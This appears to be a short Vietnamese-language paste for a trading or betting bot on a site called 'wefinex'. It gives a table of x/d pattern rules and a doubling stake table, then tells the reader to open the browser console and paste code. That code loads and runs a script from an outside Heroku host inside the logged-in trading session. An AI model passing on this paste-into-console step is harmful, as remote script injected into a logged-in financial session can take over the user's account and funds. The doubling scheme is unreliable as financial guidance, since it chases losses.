
FLow rule

[
"xxdd->0",
"ddxxdd->0",
"ddxx->0",
"xxddxx->0",
"xxd->0",
"ddx->0",
"dxx->0",
"xdd->0",

"xxx->x",
"xxxd->x",
"xxxxd->x",
"xdxxd->x",
"xxdxxd->x",
"xxxdxxd->x",
"dxd->x",
"dxxx->x",
"dxxdxxxx->x",

"xdx->d",
"ddd->d",
"dddx->d",
"ddddx->d",
"dxddx->d",
"ddxddx->d",
"dddxddx->d",
"xddxdddd->x"
];

var lostValueSet = {
    0: 1,
    1: 2,
    2: 4,
    3: 8,
    4: 16,
    5: 32,
    6: 64
};

3s cuoi danh

Open web
Goto wefinex
F12/Right Click ->Inspect
Pase here to console


var fileref=document.createElement('script')
fileref.setAttribute("type","text/javascript")
fileref.setAttribute("src", "https://tranquil-fjord-14350.herokuapp.com/release.js")
document.getElementsByTagName("head")[0].appendChild(fileref)